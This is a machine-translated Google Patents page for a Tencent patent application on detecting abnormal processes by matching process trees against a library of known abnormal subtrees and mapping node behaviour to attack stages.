CN115827379A - Abnormal process detection method, device, equipment and medium - Google Patents

Abnormal process detection method, device, equipment and medium Download PDF

Info

Publication number
CN115827379A
CN115827379A CN202211476713.6A CN202211476713A CN115827379A CN 115827379 A CN115827379 A CN 115827379A CN 202211476713 A CN202211476713 A CN 202211476713A CN 115827379 A CN115827379 A CN 115827379A
Authority
CN
China
Prior art keywords
tree
abnormal
target
node
nodes
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202211476713.6A
Other languages
Chinese (zh)
Inventor
罗梦霞
任一林
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Tencent Technology Shenzhen Co Ltd
Original Assignee
Tencent Technology Shenzhen Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Tencent Technology Shenzhen Co Ltd filed Critical Tencent Technology Shenzhen Co Ltd
Priority to CN202211476713.6A priority Critical patent/CN115827379A/en
Publication of CN115827379A publication Critical patent/CN115827379A/en
Pending legal-status Critical Current

Links

Images

Landscapes

  • Testing And Monitoring For Control Systems (AREA)

Abstract

The application relates to an abnormal process detection method, an abnormal process detection device, abnormal process detection equipment and an abnormal process detection medium, wherein the method comprises the following steps: acquiring a target process tree constructed based on a generation relation among a plurality of processes; the target process tree comprises process nodes; a generation relation exists between two process nodes on a common edge in the target process tree; matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node; performing primary anomaly detection on the target process tree based on the communication condition between the abnormal process nodes; under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node; and performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result aiming at the target process tree. By adopting the method, the accuracy rate of detecting the abnormal process can be improved.

Description

Abnormal process detection method, device, equipment and medium
Technical Field
The present application relates to computer technologies, and more particularly, to a method, an apparatus, a device, and a medium for detecting an abnormal process in the field of data security.
Background
With the development of computer technology, an abnormal process detection technology appears, and the abnormal process detection refers to a technology for performing abnormal detection on a process received by computer equipment. For example, a lot of important data are stored in the cloud host, and it is necessary to perform anomaly detection on a process received by the cloud host and intervene in the process for detecting the anomaly, so as to prevent security risk events such as virus propagation, vulnerability exploitation, data leakage and the like, and thus ensure the security of the data on the cloud host.
In the conventional technology, single-point detection is usually used, that is, whether a process is abnormal is detected based on process data of a single process, which easily causes false detection or omission, and thus the detection accuracy is low.
Disclosure of Invention
Accordingly, it is desirable to provide an abnormal process detection method, an abnormal process detection apparatus, an abnormal process detection device, and an abnormal process detection medium, which can improve the accuracy of abnormal process detection.
In a first aspect, the present application provides a method for detecting an abnormal process, where the method includes:
acquiring a target process tree constructed based on a generation relation among a plurality of processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree;
matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node;
performing preliminary anomaly detection on the target process tree based on the communication condition between the abnormal process nodes;
under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node;
and performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result aiming at the target process tree.
In a second aspect, the present application provides an abnormal process detecting apparatus, including:
the acquisition module is used for acquiring a target process tree constructed based on the generation relationship among a plurality of processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree;
the matching module is used for respectively matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node;
the detection module is used for carrying out preliminary anomaly detection on the target process tree based on the communication condition between the abnormal process nodes;
the mapping module is used for mapping the process behavior characteristics corresponding to the abnormal process node under the condition of preliminarily detecting the abnormality of the target process tree to obtain an attack stage corresponding to the abnormal process node;
the detection module is further configured to perform advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree, so as to obtain an anomaly detection result for the target process tree.
In one embodiment, the mapping module is further configured to determine a mapping relationship between preset process behavior characteristics and an attack phase; and aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node.
In an embodiment, the detection module is further configured to determine that the target process tree is abnormal if at least one stage that belongs to the execution type exists in the attack stage corresponding to each abnormal process node in the target process tree.
In one embodiment, the target process tree includes at least one process chain; each process chain comprises at least one process node; the device further comprises:
the merging module is used for generating corresponding single-point alarm information aiming at each abnormal process node in the target process tree; after the target process tree is detected to be abnormal in the advanced stage, aiming at each process chain in the target process tree, connecting single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain alarm information corresponding to the process chain; and merging the alarm information corresponding to each process chain in the target process tree to obtain target alarm information and outputting the target alarm information.
In one embodiment, the apparatus further comprises:
the first construction module is used for acquiring at least one piece of historical alarm information; the historical alarm information is obtained by respectively carrying out abnormality detection on each process node in at least one historical process tree; aiming at each piece of historical alarm information, determining a process node which the historical alarm information aims at to obtain an alarm process node which corresponds to the historical alarm information, and extracting a process sub-tree which takes the alarm process node as a new root node from a process tree which the alarm process node is in to obtain a process sub-tree which corresponds to the historical alarm information; and constructing an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information.
In one embodiment, the detection module is further configured to determine the connected abnormal process nodes from the matched abnormal process nodes to obtain target abnormal process nodes; and if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
In one embodiment, the detection module is further configured to determine connected abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes; determining abnormal process nodes with the same process behavior characteristics from the plurality of candidate abnormal process nodes; and removing the duplication of the abnormal process nodes with the same process behavior characteristics to obtain target abnormal process nodes.
In an embodiment, the matching module is further configured to compare, for each process node in the target process tree, the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library, and use the process node with the characteristics in the target process tree being consistent in comparison as the abnormal process node.
In one embodiment, process behavior characteristics are stored in the process nodes of the target process tree; the stored process behavior characteristics are extracted based on the process command corresponding to the process node; the device further comprises:
the second construction module is used for acquiring an initial process tree constructed based on the generation relation among the processes; the initial process tree comprises at least one process node storing the process command; a generating relation exists between two process nodes which are on the same side in the initial process tree; carrying out homogenization conversion on all process commands which are stored in all process nodes in the initial process tree and have different forms but the same function so as to enable all process commands with the same function to have the same form and obtain a homogenized process tree; and performing characteristic extraction on the process command in the process node of the homogenized process tree to obtain process behavior characteristics, and constructing a target process tree based on the process behavior characteristics.
In one embodiment, the process node of the target process tree further stores a command parameter corresponding to the process command; the stored process behavior characteristics are extracted based on the process command corresponding to the process node and the command parameters corresponding to the process command; the second building module is further used for carrying out feature extraction on the command parameters of the process nodes in the homogenized process tree to obtain command parameter features; and performing feature extraction on the process command and the command parameter features in the process node to obtain process behavior features, and constructing a target process tree based on the process behavior features.
In one embodiment, the apparatus further comprises:
and the updating module is used for determining the process node causing the target process tree abnormality in the abnormal process tree library and deleting the process node causing the false alarm so as to update the abnormal process tree library under the condition that the abnormality detection result indicates that the target process tree is abnormal but the target process tree is not really abnormal.
In one embodiment, the obtaining module is further configured to obtain a target process tree of the host; the target process tree is constructed according to the generation relationship among a plurality of processes running on the host; the detection module is further configured to determine that a process attacking the host exists in the plurality of processes if the anomaly detection result for the target process tree indicates that the target process tree is anomalous.
In a third aspect, the present application provides a computer device comprising a memory and a processor, wherein the memory stores a computer program, and the processor implements the steps in the method embodiments of the present application when executing the computer program.
In a fourth aspect, the present application provides a computer-readable storage medium storing a computer program which, when executed by a processor, performs the steps in the method embodiments of the present application.
In a fifth aspect, the present application provides a computer program product comprising a computer program which, when executed by a processor, performs the steps in the method embodiments of the present application.
The abnormal process detection method, the abnormal process detection device, the abnormal process detection equipment, the abnormal process detection media and the abnormal process detection computer program product are characterized in that a target process tree constructed based on a generation relation among a plurality of processes is obtained; the target process tree comprises at least one process node; and because each process node in the abnormal process tree library is abnormal, the abnormal process node in the target process tree can be more accurately determined. And then the preliminary anomaly detection of the target process tree is carried out based on the communication condition between the abnormal process nodes, so that whether the target process tree is abnormal or not can be accurately preliminarily detected. And under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node. Because a generating relation exists between two process nodes on a common edge in the target process tree, the target process tree is subjected to advanced anomaly detection through the attack stages corresponding to the abnormal process nodes in the target process tree, so that the information of the attack process corresponding to the abnormal process nodes in the target process tree is comprehensively considered, the anomaly detection result aiming at the target process tree can be accurately obtained, and the detection accuracy rate aiming at the abnormal process is improved.
Drawings
FIG. 1 is a diagram of an exemplary implementation of a method for detecting abnormal processes;
FIG. 2 is a flowchart illustrating a method for detecting an abnormal process according to an embodiment;
FIG. 3 is a diagram of a target process tree structure in one embodiment;
FIG. 4 is a diagram illustrating a mapping relationship between process behavior characteristics and attack phases in an embodiment;
FIG. 5 is a diagram illustrating alarm information for conventional single point detection in one embodiment;
FIG. 6 is a diagram illustrating an exemplary display of alarm information according to the present application;
FIG. 7 is a diagram of process nodes in communication in one embodiment;
FIG. 8 is a diagram illustrating feature extraction levels for command parameters in one embodiment;
FIG. 9 is a block diagram that illustrates an overall framework for abnormal process detection, in accordance with an embodiment;
FIG. 10 is a flowchart illustrating a method for detecting an abnormal process in another embodiment;
FIG. 11 is a block diagram showing an example of the structure of an abnormal process detecting apparatus;
FIG. 12 is a diagram showing an internal structure of a computer device in one embodiment;
fig. 13 is an internal structural view of a computer device in another embodiment.
Detailed Description
In order to make the objects, technical solutions and advantages of the present application more apparent, the present application is described in further detail below with reference to the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative of the present application and are not intended to limit the present application.
The abnormal process detection method provided by the application can be applied to the application environment shown in fig. 1. Wherein the terminal 102 communicates with the server 104 via a network. The data storage system may store data that the server 104 needs to process. The data storage system may be integrated on the server 104, or may be placed on the cloud or other server. The terminal 102 may be, but not limited to, various desktop computers, notebook computers, smart phones, tablet computers, internet of things devices and portable wearable devices, and the internet of things devices may be smart speakers, smart televisions, smart air conditioners, smart car-mounted devices, and the like. The portable wearable device can be a smart watch, a smart bracelet, a head-mounted device, and the like. The server 104 may be an independent physical server, a server cluster or a distributed system formed by a plurality of physical servers, or a cloud server providing network security services such as cloud service, cloud database, cloud computing, cloud function, cloud storage, network service, cloud communication, middleware service, domain name service, cloud security, host security, and the like, a CDN, and basic cloud computing services such as a big data and artificial intelligence platform. The terminal 102 and the server 104 may be directly or indirectly connected through wired or wireless communication, and the application is not limited thereto.
The server 104 may obtain a target process tree constructed based on a generative relationship among a plurality of processes; the target process tree comprises at least one process node; a generative relationship exists between two process nodes that are co-located in the target process tree. The server 104 may match each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node, and perform preliminary abnormal detection on the target process tree based on a communication condition between the abnormal process nodes. Under the condition of preliminarily detecting the abnormality of the target process tree, the server 104 can map the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node; and performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result aiming at the target process tree.
It is understood that the server 104 may send the anomaly detection result for the target process tree to the terminal 102 for display. This embodiment is not limited to this, and it should be understood that the application scenario in fig. 1 is only an illustrative example, and is not limited to this.
It should be noted that the abnormal process detection method in some embodiments of the present application uses an artificial intelligence technique. For example, the command parameter features of the command parameters of the application belong to the feature extraction of the command parameters of the process nodes in the process tree after homogenization by using an artificial intelligence technology.
In one embodiment, as shown in fig. 2, an abnormal process detection method is provided, and the method is applicable to a computer device, where the computer device may be a terminal or a server, and is executed by the terminal or the server itself, or may be implemented through interaction between the terminal and the server, and includes the following steps:
step 202, acquiring a target process tree constructed based on a generation relation among a plurality of processes; the target process tree comprises at least one process node; a generative relationship exists between two process nodes that are co-located in the target process tree.
A process is a running activity of a program in a computer device on a specific data set, and is a basic unit for resource allocation and scheduling of a system. A process node is a node abstracted for a process. A process tree is a tree structure made up of at least one process node, the process tree being used to visually represent relationships between processes. The target process tree is the process tree to be exception detected. The generation relationship exists between two process nodes on a common edge in the target process tree, and it can be understood that the two process nodes are connected in a single direction through the edge, and the two process nodes connected in the single direction through the edge are respectively a parent process node and a child process node. It can be understood that the parent process node and the child process node are directly connected through an edge, and the edge connecting the parent process node and the child process node can represent the generation relationship between the parent process node and the child process node. The generation relationship may be understood that the condition that the child process node exists is that the corresponding parent process node exists, and if the corresponding parent process node does not exist, the corresponding child process node is not generated. The target process tree includes at least one process chain, each process chain including at least one process node. And each process node in each process chain corresponds to each operation step. It can be understood that the penetration attack process on the computer device may include a plurality of operation steps, and a penetration attack on the computer device may be implemented through a process attack chain formed by the plurality of operation steps, and it can be understood that the penetration attack is a system progressive comprehensive attack mode.
In one embodiment, as shown in FIG. 3, the target process tree includes 10 process nodes. A generative relationship exists between two process nodes on a common edge in the target process tree, for example, a generative relationship exists between the process node 1 and the process node 2, and a generative relationship exists between the process node 2 and the process node 8. The target process tree includes six process chains, where the first process chain includes process node 1, process node 2, and process node 8. The second process chain includes process node 1 and process node 3. The third process chain includes process node 1, process node 4, and process node 9. The fourth process chain includes process node 1 and process node 5. The fifth process chain includes process node 1 and process node 6. The sixth process chain includes process node 1, process node 7, and process node 10. It can be understood that each process node in each process chain corresponds to each operation step.
In one embodiment, a plurality of processes can run on a computer device, the computer device can acquire the plurality of processes running locally and determine a generation relationship among the plurality of processes, and the computer device can construct a target process tree based on the generation relationship among the plurality of processes. It is to be understood that the plurality of processes running on the computer device may specifically be a plurality of processes running on the computer device within a preset time period, that is, the plurality of processes running on the computer device may be processes respectively running on the computer device at different time points.
In one embodiment, the computer device may further directly obtain a target process tree constructed based on a generative relationship among the plurality of processes from a third-party device. It will be appreciated that the process of building the target process tree may be performed not on a computer device, but on a third party device. Specifically, the computer device may run a plurality of processes, the third-party device may obtain the plurality of processes from the computer device, and determine a generation relationship among the plurality of processes, and the third-party device may construct the target process tree based on the generation relationship among the plurality of processes.
And 204, matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node.
The abnormal process tree library is a database formed by abnormal process trees. It can be understood that the abnormal process tree library includes at least one abnormal process tree, and a process corresponding to a process node in the abnormal process tree is an abnormal process. And the abnormal process node is a process node which is in the target process tree and is matched with the process node in the abnormal process tree library, and it can be understood that the process corresponding to the abnormal process node in the target process tree is considered to be abnormal.
In one embodiment, the process node of the target process tree and the process node in the abnormal process tree library both store corresponding process behavior characteristics, and it can be understood that the process behavior characteristics are extracted based on the process data corresponding to the corresponding process node. The computer device can match each process node in the target process tree with a process node in a pre-constructed abnormal process tree library respectively based on the process behavior characteristics stored in the process node of the target process tree and the process behavior characteristics stored in the process node in the abnormal process tree library to obtain the matched abnormal process node. Wherein the process data is operation data related to the process.
In one embodiment, process data is stored in both the process nodes of the target process tree and the process nodes in the abnormal process tree library. It can be understood that, for each process node in the target process tree, the computer device may compare the process data in the process node with the process data of each process node in the abnormal process tree library, and take the process node with the data in the target process tree being consistently compared as the abnormal process node.
In one embodiment, the process data includes process commands. In one embodiment, the process data includes, in addition to the process command, a command parameter corresponding to the process command. Wherein the process command is a computer instruction in a process. The command parameters are the operating parameters corresponding to the process commands. For example, the process command is https (Hypertext Transfer Protocol Secure), and the command parameter corresponding to https may be a specific IP (Internet Protocol) address.
And step 206, performing preliminary abnormal detection on the target process tree based on the communication condition between the abnormal process nodes.
The process nodes are considered to be connected with each other if the process nodes have the directly connected edge. The preliminary anomaly detection refers to preliminary anomaly detection on the target process tree, and it can be understood that preliminary detection on the target process tree only indicates that the target process tree has the possibility of anomaly, and cannot finally determine whether the target process tree is finally anomalous.
Specifically, the computer device may determine connectivity conditions between the abnormal process nodes and perform preliminary anomaly detection on the target process tree based on the connectivity conditions between the abnormal process nodes.
In one embodiment, if there are connected abnormal process nodes in the target process tree, the target process tree is preliminarily determined to be abnormal.
And step 208, under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node.
The attack stage refers to a stage in which a process corresponding to the abnormal process node is located in an attack process. The attack phase may include at least one of an information detection type phase, a persistence type phase, an execution type phase, and the like. The information detection type stage refers to a stage including an information detection type behavior in an attack process. The persistent type phase refers to a phase including a persistent type behavior in an attack process. The phase of the execution type refers to a phase including an action of the execution type in the attack process.
In one embodiment, the information probing type behavior may include obtaining at least one of port information and vulnerability information of an attack object. The persistence type of behavior may include at least one of adding an operation to the object and modifying rights to the object, and the like. The execution type of behavior may include at least one of downloading a file, compiling and decompressing, and the like.
Specifically, under the condition of preliminarily detecting the abnormality of the target process tree, for each abnormal process node in the target process tree, the computer device may determine the process behavior characteristics corresponding to the abnormal process node, and map the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node.
In one embodiment, mapping the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node includes: determining a mapping relation between preset process behavior characteristics and an attack stage; and aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node. In this embodiment, the attack stage mapped with the process behavior feature corresponding to the abnormal process node is determined according to the preset mapping relationship between the process behavior feature and the attack stage, so that the acquisition accuracy of the attack stage corresponding to the abnormal process node can be improved.
In one embodiment, the mapping table shown in fig. 4 records a mapping relationship between preset process behavior characteristics and attack phases. Based on the mapping relation recorded in the mapping table, the computer device can determine the attack stage mapped with the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node.
And step 210, performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree, so as to obtain an anomaly detection result for the target process tree.
Specifically, the target process tree is constructed from generative relationships between a plurality of processes running on the computer device. The computer equipment can carry out advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree, and obtain an anomaly detection result aiming at the target process tree. And if the abnormality detection result aiming at the target process tree indicates that the target process tree is abnormal, judging that a process for attacking the computer equipment exists in a plurality of processes running on the computer equipment. And if the abnormal detection result aiming at the target process tree indicates that the target process tree is normal, judging that the process for attacking the computer equipment does not exist in the plurality of processes running on the computer equipment.
In one embodiment, if a stage of a preset type exists in an attack stage corresponding to each abnormal process node in a target process tree, it is determined that the target process tree is abnormal. And if the stage of the preset type does not exist in the attack stage corresponding to each abnormal process node in the target process tree, judging that the target process tree is normal.
In the abnormal process detection method, a target process tree constructed based on a generation relation among a plurality of processes is obtained; the target process tree comprises at least one process node; and because each process node in the abnormal process tree library is abnormal, the abnormal process node in the target process tree can be more accurately determined. And then the preliminary anomaly detection of the target process tree is carried out based on the communication condition between the abnormal process nodes, so that whether the target process tree is abnormal or not can be accurately preliminarily detected. And under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node. Because a generating relation exists between two process nodes on a common edge in the target process tree, the target process tree is subjected to advanced anomaly detection through the attack stages corresponding to the abnormal process nodes in the target process tree, so that the information of the attack process corresponding to the abnormal process nodes in the target process tree is comprehensively considered, the anomaly detection result aiming at the target process tree can be accurately obtained, and the detection accuracy rate aiming at the abnormal process is improved.
In one embodiment, performing advanced anomaly detection on a target process tree according to attack stages corresponding to each anomalous process node in the target process tree, to obtain an anomaly detection result for the target process tree, includes: and if at least one stage belonging to the execution type exists in the attack stages respectively corresponding to the abnormal process nodes in the target process tree, judging that the target process tree is abnormal.
Specifically, the attack phase may include at least one of an information detection type phase, a persistence type phase, an execution type phase, and the like. If at least one stage belonging to the execution type exists in the attack stages respectively corresponding to all abnormal process nodes in the target process tree, the computer equipment can judge that the target process tree is abnormal. On the contrary, it can be understood that if the attack phase corresponding to each abnormal process node in the target process tree has the phase of the information detection type and the phase of the persistence type, but does not have the phase of the execution type, the computer device may determine that the target process tree is normal.
It can be understood that the attack process is a chain, the complete attack chain has a networking behavior for acquiring resources, and after the resources are acquired, the execution type behavior is started. If the target process tree is detected to be abnormal preliminarily and the attack process corresponding to the target process tree includes suspicious behaviors before and after networking, which indicates that the probability of the abnormality of the target process tree is very high, the abnormality of the target process tree can be further determined. It is to be appreciated that suspicious behavior can include at least one of the above-described information detection type of behavior, persistence type of behavior, execution type of behavior, and the like.
In the above embodiment, whether the target process tree is abnormal is determined by determining whether the attack stage corresponding to each abnormal process node in the target process tree has the stage of the execution type, so that the detection accuracy rate for the abnormal process can be further improved.
In one embodiment, the target process tree includes at least one process chain; each process chain comprises at least one process node; the method further comprises the following steps: generating corresponding single-point alarm information aiming at each abnormal process node in the target process tree; after the target process tree is detected to be abnormal in the advanced stage, aiming at each process chain in the target process tree, connecting single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain alarm information corresponding to the process chain; and merging the alarm information corresponding to each process chain in the target process tree to obtain and output target alarm information.
The single-point alarm information is alarm information generated for a single abnormal process node, and it can be understood that one abnormal process node corresponds to one single-point alarm information. The target alarm information is alarm information generated for a target process tree, and it can be understood that one target process tree corresponds to one piece of target alarm information.
Specifically, after each process node in the target process tree is respectively matched with a process node in the abnormal process tree library to obtain a matched abnormal process node, the computer device may generate corresponding single-point alarm information for each abnormal process node in the target process tree. After the target process tree is detected to be abnormal in the advanced stage, for each process chain in the target process tree, if at least one abnormal process node exists on the process chain, the computer equipment can connect the single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain the alarm information corresponding to the process chain. Furthermore, the computer device can merge the alarm information corresponding to each process chain in the target process tree, so as to obtain and output the target alarm information for the target process tree. It can be understood that the single-point alarm information corresponding to each abnormal process node is not directly output and displayed to the user, and the final output and display to the user is the target alarm information generated by synthesizing the single-point alarm information corresponding to each abnormal process node.
In the conventional alarm information display of single-point monitoring, as shown in fig. 5, each row in the diagram represents an alarm information obtained by detecting an abnormal process. In the traditional single-point monitoring alarm information display, the four pieces of alarm information are respectively displayed to a user, and no relevance exists among the alarm information. The alarm information display of the present application is, as shown in fig. 6, capable of concatenating and merging single-point alarm information corresponding to each abnormal process node in the same process tree, and outputting the merged target alarm information. It can be understood that, for each abnormal process tree, only one piece of combined alarm information with context information is finally displayed to the user.
In the above embodiment, the single-point alarm information corresponding to each abnormal process node in the process chain is connected in series to obtain the alarm information corresponding to the process chain, and the alarm information corresponding to each process chain in the target process tree is combined to obtain the target alarm information and output the target alarm information. Compared with the traditional single-point detection method that one piece of alarm information is output for each abnormal process, scattered detection result data lack contact with each other, the single-point alarm information corresponding to each abnormal process node on the process chain is connected in series, the scattered detection result data are integrated, and the context information richness of the alarm information is improved.
In one embodiment, the method further comprises a step of constructing an abnormal process tree library; the method comprises the following steps of: acquiring at least one piece of historical alarm information; the historical alarm information is obtained by respectively carrying out abnormality detection on each process node in at least one historical process tree; aiming at each piece of historical alarm information, determining a process node aimed at by the historical alarm information to obtain an alarm process node corresponding to the historical alarm information, and extracting a process subtree taking the alarm process node as a new root node from a process tree in which the alarm process node is positioned to obtain a process subtree corresponding to the historical alarm information; and constructing an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information.
The historical process tree is constructed based on the historical generation relationship among a plurality of processes. It is understood that historical processes refer to processes recorded in the process log prior to abnormal process detection. The alarm process node is a process node which causes generation of historical alarm information in a historical process tree. The process subtree is a subtree which is intercepted from the history process tree by taking the alarm process node as a root node.
Specifically, the computer device may record processes in a process log before abnormal process detection, acquire a plurality of historical processes, and build a historical process tree based on a generation relationship among the plurality of historical processes. The computer equipment can respectively detect the abnormality of each process node in the historical process tree to obtain the historical alarm information of the abnormal process node. And aiming at each piece of historical alarm information, the computer equipment can determine the process node aimed at by the historical alarm information to obtain the alarm process node corresponding to the historical alarm information, and extract a process sub-tree taking the alarm process node as a new root node from the process tree where the alarm process node is located to obtain the process sub-tree corresponding to the historical alarm information. Furthermore, the computer equipment can construct an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information.
In one embodiment, the computer device may perform feature extraction on the process data corresponding to the process nodes in each process subtree to obtain process behavior features, and store the process behavior features in a tree structure in the database to obtain an abnormal process tree library. It can be understood that the process behavior characteristics corresponding to the process are stored in each process node in the abnormal process tree library.
In one embodiment, the computer device may store the process data corresponding to the process nodes in each process subtree in the database in a tree structure to obtain an abnormal process tree library. It can be understood that stored in each process node in the abnormal process tree library is process data corresponding to a process.
In the above embodiment, the process subtree corresponding to the historical warning information is obtained by extracting the process subtree taking the warning process node as the new root node from the process tree in which the warning process node is located, and since the process corresponding to the warning process node is abnormal, the possibility that each process node in the process subtree corresponding to the historical warning information is abnormal is high, an abnormal process tree library is constructed according to the process subtree corresponding to each historical warning information, so that the accuracy of the abnormal process node in the abnormal process tree library can be improved, and the accuracy of the matched abnormal process node can be improved when each process node in the target process tree is subsequently matched with the process node in the abnormal process tree library.
In one embodiment, the preliminary anomaly detection of the target process tree based on the connectivity condition between the abnormal process nodes comprises the following steps: determining communicated abnormal process nodes from the matched abnormal process nodes to obtain target abnormal process nodes; and if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
The target abnormal process node is the abnormal process node which is determined to be communicated from the matched abnormal process nodes. It can be understood that if there are multiple groups of target abnormal process nodes in the target process tree, a path can be formed between the target abnormal process nodes of each group.
Specifically, the computer device may determine the connected abnormal process nodes from the matched abnormal process nodes to obtain the target abnormal process node. For each group of target abnormal process nodes existing in the target process tree, the computer device may compare the number of the group of target abnormal process nodes with a preset number threshold. And if the number of any group of target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
In one embodiment, as shown in FIG. 7, there are 7 connected abnormal process nodes, namely, process node a, process node b, process node c, process node d, process node e, process node f and process node g. If the preset number threshold is 4 and the number of the 7 connected abnormal process nodes is greater than 4, the computer device may preliminarily determine that the target process tree to which the 7 connected abnormal process nodes belong is abnormal.
In the above embodiment, the connected abnormal process nodes can represent the generation relationship between the processes corresponding to the respective process-performing nodes, and the number of the connected target abnormal process nodes can represent the abnormal degree of the corresponding process tree to a certain extent, so that whether the target process tree is abnormal or not is preliminarily determined by determining the number of the connected target abnormal process nodes, and the accuracy of preliminary detection of the abnormality of the target process tree can be improved.
In one embodiment, determining the connected abnormal process nodes from the matched abnormal process nodes to obtain the target abnormal process node includes: determining communicated abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes; determining abnormal process nodes with the same process behavior characteristics from a plurality of candidate abnormal process nodes; and removing the duplication of the abnormal process nodes with the same process behavior characteristics to obtain the target abnormal process node.
And the candidate abnormal process nodes are the abnormal process nodes which are determined to be communicated from the matched abnormal process nodes and are before the duplication elimination. It is understood that the candidate abnormal process nodes may include abnormal process nodes with the same process behavior characteristics.
Specifically, the computer device may determine the connected abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes. The computer device can determine process characteristics corresponding to the abnormal process nodes of each candidate, and determine the abnormal process nodes with the same process behavior characteristics from the abnormal process nodes of the candidates. Furthermore, the computer equipment can perform duplicate removal on the abnormal process nodes with the same process behavior characteristics to obtain the target abnormal process node.
In an embodiment, the computer device may perform deduplication on the abnormal process nodes with the same process behavior characteristics, and may regard each abnormal process node with the same process behavior characteristics as an abnormal process node, and when performing quantity statistics, the number of each abnormal process node with the same process behavior characteristics is recorded as 1, and no quantity superposition is performed.
In the above embodiment, because the plurality of abnormal process nodes with the same process behavior characteristics have the same represented abnormal information, there is no overlapping effect on the improvement of the abnormal preliminary detection accuracy of the target process tree, and therefore, the abnormal process nodes with the same process behavior characteristics are deduplicated to obtain the target abnormal process node, and then whether the target process tree is abnormal is preliminarily determined by determining the number of the communicated target abnormal process nodes, so that the abnormal preliminary detection accuracy of the target process tree can be further improved.
In one embodiment, matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node includes: and aiming at each process node in the target process tree, comparing the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library respectively, and taking the process node with the consistent characteristics in the target process tree as the abnormal process node.
Specifically, the computer device may determine process behavior characteristics corresponding to each process node in the abnormal process tree library. And aiming at each process node in the target process tree, the computer equipment can determine the process behavior characteristics corresponding to the process node, respectively compare the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to the process nodes in the abnormal process tree library, and take the process nodes with consistent characteristics in the target process tree as abnormal process nodes.
In one embodiment, the process node of the target process tree and the process node in the abnormal process tree library both store corresponding process behavior characteristics, and it can be understood that the process behavior characteristics are extracted based on the process data corresponding to the corresponding process node. For each process node in the target process tree, the computer device may compare the process behavior characteristics in the process node with the process behavior characteristics in each process node in the abnormal process tree library, and use the process node with the characteristics in the target process tree being consistent as the abnormal process node.
In one embodiment, process data is stored in both the process nodes of the target process tree and the process nodes in the abnormal process tree library. It can be understood that the computer device can perform feature extraction on the process data stored in the process node in the abnormal process tree library to obtain the process behavior feature corresponding to each process node in the abnormal process tree library. And aiming at each process node in the target process tree, the computer equipment can extract the characteristics of the process data stored by the process node of the target process tree to obtain the process behavior characteristics corresponding to the process node in the target process tree, respectively compare the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to the process nodes in the abnormal process tree library, and take the process node with the characteristics in the target process tree which are consistent in comparison as the abnormal process node.
In the above embodiment, since the process behavior characteristics can accurately represent the abnormal information corresponding to the corresponding process node, the determination accuracy of the abnormal process node can be further improved by comparing the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library.
